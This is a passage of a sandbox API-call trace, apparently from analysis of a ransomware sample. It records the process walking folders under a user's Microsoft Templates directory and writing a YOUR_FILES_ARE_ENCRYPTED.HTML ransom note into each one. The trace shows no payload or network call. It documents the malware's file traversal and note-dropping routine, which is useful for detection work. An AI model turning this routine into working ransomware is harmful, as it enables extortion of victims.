lpNumberOfBytesWritten=0x19d840*=0x3c00, lpOverlapped=0x0) returned 1 [0123.325] CloseHandle (hObject=0x214) returned 1 [0123.325] GetProcessHeap () returned 0x600000 [0123.326] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x336a170 | out: hHeap=0x600000) returned 1 [0123.326] GetProcessHeap () returned 0x600000 [0123.326] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0123.326] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96e30af9, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96e30af9, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96e30af9, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6db248, dwReserved1=0x632e00, cFileName="1033", cAlternateFileName="")) returned 0 [0123.326] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0123.326] wnsprintfW (in: pszDest=0x3350010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 129 [0123.326] GetProcessHeap () returned 0x600000 [0123.326] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x336a170 [0123.326] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\user\\smartart graphics\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0123.327] WriteFile (in: hFile=0x30c, lpBuffer=0x336a170*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19db54, lpOverlapped=0x0 | out: lpBuffer=0x336a170*, lpNumberOfBytesWritten=0x19db54*=0x3c00, lpOverlapped=0x0) returned 1 [0123.328] CloseHandle (hObject=0x30c) returned 1 [0123.328] GetProcessHeap () returned 0x600000 [0123.328] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x336a170 | out: hHeap=0x600000) returned 1 [0123.328] GetProcessHeap () returned 0x600000 [0123.329] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3350010 | out: hHeap=0x600000) returned 1 [0123.329] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96dfa773, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96dfa773, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96dfa773, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632e92, dwReserved1=0x632df8, cFileName="Word Document Bibliography Styles", cAlternateFileName="WORDDO~1")) returned 1 [0123.329] StrStrIW (lpFirst="Word Document Bibliography Styles", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.329] wnsprintfW (in: pszDest=0x3340008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Word Document Bibliography Styles") returned 115 [0123.329] GetProcessHeap () returned 0x600000 [0123.329] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3350010 [0123.329] lstrcpyW (in: lpString1=0x3350010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Word Document Bibliography Styles" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Word Document Bibliography Styles") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Word Document Bibliography Styles" [0123.329] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Word Document Bibliography Styles", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Word Document Bibliography Styles\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Word Document Bibliography Styles\\*" [0123.329] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Word Document Bibliography Styles\\*", lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96dfa773, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96dfa773, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96dfa773, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6db248, dwReserved1=0x632e00, cFileName=".", cAlternateFileName="")) returned 0x6268b8 [0123.329] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96dfa773, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96dfa773, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96dfa773, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6db248, dwReserved1=0x632e00, cFileName="..", cAlternateFileName="")) returned 1 [0123.329] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96dfa773, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96dfa773, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96dfa773, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6db248, dwReserved1=0x632e00, cFileName="..", cAlternateFileName="")) returned 0 [0123.329] FindClose (in: hFindFile=0x6268b8 | out: hFindFile=0x6268b8) returned 1 [0123.329] wnsprintfW (in: pszDest=0x3350010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Word Document Bibliography Styles\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 145 [0123.329] GetProcessHeap () returned 0x600000 [0123.329] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x336a170 [0123.329] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Word Document Bibliography Styles\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\user\\word document bibliography styles\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0123.331] WriteFile (in: hFile=0x30c, lpBuffer=0x336a170*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19db54, lpOverlapped=0x0 | out: lpBuffer=0x336a170*, lpNumberOfBytesWritten=0x19db54*=0x3c00, lpOverlapped=0x0) returned 1 [0123.332] CloseHandle (hObject=0x30c) returned 1 [0123.332] GetProcessHeap () returned 0x600000 [0123.332] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x336a170 | out: hHeap=0x600000) returned 1 [0123.332] GetProcessHeap () returned 0x600000 [0123.332] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3350010 | out: hHeap=0x600000) returned 1 [0123.332] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96ec9752, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96ec9752, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96ec9752, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632e92, dwReserved1=0x632df8, cFileName="Word Document Building Blocks", cAlternateFileName="WORDDO~2")) returned 1 [0123.332] StrStrIW (lpFirst="Word Document Building Blocks", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.332] wnsprintfW (in: pszDest=0x3340008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Word Document Building Blocks") returned 111 [0123.332] GetProcessHeap () returned 0x600000 [0123.332] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3350010 [0123.332] lstrcpyW (in: lpString1=0x3350010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Word Document Building Blocks" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Word Document Building Blocks") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Word Document Building Blocks" [0123.332] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Word Document Building Blocks", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Word Document Building Blocks\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Word Document Building Blocks\\*" [0123.332] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Word Document Building Blocks\\*", lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96ec9752, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96ec9752, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96ec9752, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6db248, dwReserved1=0x632e00, cFileName=".", cAlternateFileName="")) returned 0x626638 [0123.332] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96ec9752, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96ec9752, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96ec9752, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6db248, dwReserved1=0x632e00, cFileName="..", cAlternateFileName="")) returned 1 [0123.333] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96ec9752, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96ec9752, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96ec9752, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6db248, dwReserved1=0x632e00, cFileName="1033", cAlternateFileName="")) returned 1 [0123.333] StrStrIW (lpFirst="1033", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.333] wnsprintfW (in: pszDest=0x3350010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Word Document Building Blocks\\1033") returned 116 [0123.333] GetProcessHeap () returned 0x600000 [0123.333] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x670340 [0123.333] lstrcpyW (in: lpString1=0x670340, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Word Document Building Blocks\\1033" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Word Document Building Blocks\\1033") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Word Document Building Blocks\\1033" [0123.333] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Word Document Building Blocks\\1033", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Word Document Building Blocks\\1033\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Word Document Building Blocks\\1033\\*" [0123.333] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Word Document Building Blocks\\1033\\*", lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96ec9752, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96ec9752, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96ec9752, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f79f8, dwReserved1=0x6f7918, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0123.333] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96ec9752, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96ec9752, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96ec9752, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f79f8, dwReserved1=0x6f7918, cFileName="..", cAlternateFileName="")) returned 1 [0123.333] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96ec9752, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96ec9752, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96ec9752, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f79f8, dwReserved1=0x6f7918, cFileName="..", cAlternateFileName="")) returned 0 [0123.333] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0123.333] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Word Document Building Blocks\\1033\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 146 [0123.333] GetProcessHeap () returned 0x600000 [0123.333] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x336a170 [0123.333] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Word Document Building Blocks\\1033\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\user\\word document building blocks\\1033\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0123.334] WriteFile (in: hFile=0x214, lpBuffer=0x336a170*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19d840, lpOverlapped=0x0 | out: lpBuffer=0x336a170*, lpNumberOfBytesWritten=0x19d840*=0x3c00, lpOverlapped=0x0) returned 1 [0123.336] CloseHandle (hObject=0x214) returned 1 [0123.336] GetProcessHeap () returned 0x600000 [0123.336] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x336a170 | out: hHeap=0x600000) returned 1 [0123.336] GetProcessHeap () returned 0x600000 [0123.336] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0123.336] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96ec9752, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96ec9752, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96ec9752, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6db248, dwReserved1=0x632e00, cFileName="1033", cAlternateFileName="")) returned 0 [0123.336] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0123.336] wnsprintfW (in: pszDest=0x3350010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Word Document Building Blocks\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 141 [0123.336] GetProcessHeap () returned 0x600000 [0123.336] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x336a170 [0123.336] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Word Document Building Blocks\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\user\\word document building blocks\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0123.337] WriteFile (in: hFile=0x30c, lpBuffer=0x336a170*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19db54, lpOverlapped=0x0 | out: lpBuffer=0x336a170*, lpNumberOfBytesWritten=0x19db54*=0x3c00, lpOverlapped=0x0) returned 1 [0123.338] CloseHandle (hObject=0x30c) returned 1 [0123.338] GetProcessHeap () returned 0x600000 [0123.339] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x336a170 | out: hHeap=0x600000) returned 1 [0123.339] GetProcessHeap () returned 0x600000 [0123.339] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3350010 | out: hHeap=0x600000) returned 1 [0123.341] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96ec9752, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96ec9752, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96ec9752, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632e92, dwReserved1=0x632df8, cFileName="Word Document Building Blocks", cAlternateFileName="WORDDO~2")) returned 0 [0123.341] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0123.341] wnsprintfW (in: pszDest=0x3340008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 111 [0123.341] GetProcessHeap () returned 0x600000 [0123.341] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x336a170 [0123.341] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\user\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0123.342] WriteFile (in: hFile=0x318, lpBuffer=0x336a170*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19de68, lpOverlapped=0x0 | out: lpBuffer=0x336a170*, lpNumberOfBytesWritten=0x19de68*=0x3c00, lpOverlapped=0x0) returned 1 [0123.343] CloseHandle (hObject=0x318) returned 1 [0123.343] GetProcessHeap () returned 0x600000 [0123.343] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x336a170 | out: hHeap=0x600000) returned 1 [0123.343] GetProcessHeap () returned 0x600000 [0123.343] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0123.343] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96dfa773, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96e30af9, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96e30af9, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311b068, dwReserved1=0x6f4620, cFileName="User", cAlternateFileName="")) returned 0 [0123.343] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0123.344] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 106 [0123.344] GetProcessHeap () returned 0x600000 [0123.344] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x336a170 [0123.344] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0123.344] WriteFile (in: hFile=0x320, lpBuffer=0x336a170*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x336a170*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0123.345] CloseHandle (hObject=0x320) returned 1 [0123.345] GetProcessHeap () returned 0x600000 [0123.345] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x336a170 | out: hHeap=0x600000) returned 1 [0123.345] GetProcessHeap () returned 0x600000 [0123.346] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6c47b8 | out: hHeap=0x600000) returned 1 [0123.347] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d61fa7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d61fa7, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f4694, dwReserved1=0x6f4618, cFileName="16", cAlternateFileName="")) returned 0 [0123.347] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0123.347] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 103 [0123.347] GetProcessHeap () returned 0x600000 [0123.347] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x336a170 [0123.347] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0123.348] WriteFile (in: hFile=0x324, lpBuffer=0x336a170*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x336a170*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0123.349] CloseHandle (hObject=0x324) returned 1 [0123.349] GetProcessHeap () returned 0x600000 [0123.349] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x336a170 | out: hHeap=0x600000) returned 1 [0123.349] GetProcessHeap () returned 0x600000 [0123.349] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0123.350] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4614163, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa4614163, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa46a67ce, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x4641, dwReserved0=0x62f230, dwReserved1=0x0, cFileName="Normal.dotm", cAlternateFileName="NORMAL~1.DOT")) returned 1 [0123.350] StrStrIW (lpFirst="Normal.dotm", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.350] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm") returned 73 [0123.350] PathFindExtensionW (pszPath="Normal.dotm") returned=".dotm" [0123.350] lstrlenW (lpString=".dotm") returned 5 